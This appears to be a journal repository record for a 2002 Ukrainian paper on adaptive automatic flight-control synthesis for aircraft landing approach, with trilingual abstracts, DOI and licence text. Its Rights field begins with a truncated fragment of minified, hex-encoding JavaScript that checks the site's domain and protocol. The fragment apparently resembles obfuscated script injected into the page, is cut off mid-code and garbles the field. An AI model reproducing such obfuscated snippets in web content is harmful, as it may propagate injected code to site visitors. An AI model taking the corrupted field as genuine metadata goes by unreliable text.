Запис Детальніше

Синтез нестаціонарної системи автоматичного керування польотом літака при заході на посадку

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Синтез нестаціонарної системи автоматичного керування польотом літака при заході на посадку
Синтез нестационарной системы автоматического управления полетом самолета при заходе на посадку
Synthesis of non-stationary automatic flight control system for approaching
 
Creator Краснопольський, А. О.; Національний авіаційний університет
 
Subject

УДК 629.735.051-52






 
Description Запропоновано метод синтезу структури системи автоматичного керування, що допускає великий коефіцієнт підсилення без порушення стійкості. Розглянуто адаптивну систему у вигляді алгоритму і структурної схеми, що можуть бути використані у програмі бортового обчислювального комплексу на прикладі літака цивільної авіації, для автоматичного настроювання коефіцієнта підсилення, виходячи з вимог заданої стійкості перехідного процесу
Предложен метод синтеза структуры системы автоматического управления, допускает большой коэффициент усиления без нарушения устойчивости. Рассмотрены адаптивную систему в виде алгоритма и структурной схемы, которые могут быть использованы в программе бортового вычислительного комплекса на примере самолета гражданской авиации, для автоматической настройки коэффициента усиления, исходя из требований заданной устойчивости переходного процесса
The method of synthesis of the structure of the automatic control system, which allows a large gain without disturbance of stability, is proposed. An adaptive system is considered in the form of an algorithm and a structural scheme that can be used in a program of onboard computing complex on an example of a civil aircraft, for automatic adjustment of the gain, based on the requirements of the specified stability of the transition process
 
Publisher National Aviation University
 
Contributor


 
Date 2019-04-23
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13588
10.18372/2306-1472.12.13588
 
Source Proceedings of the National Aviation University; Том 12, № 1 (2002); 97-103
Вестник Национального авиационного университета; Том 12, № 1 (2002); 97-103
Вісник Національного Авіаційного Університету; Том 12, № 1 (2002); 97-103
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).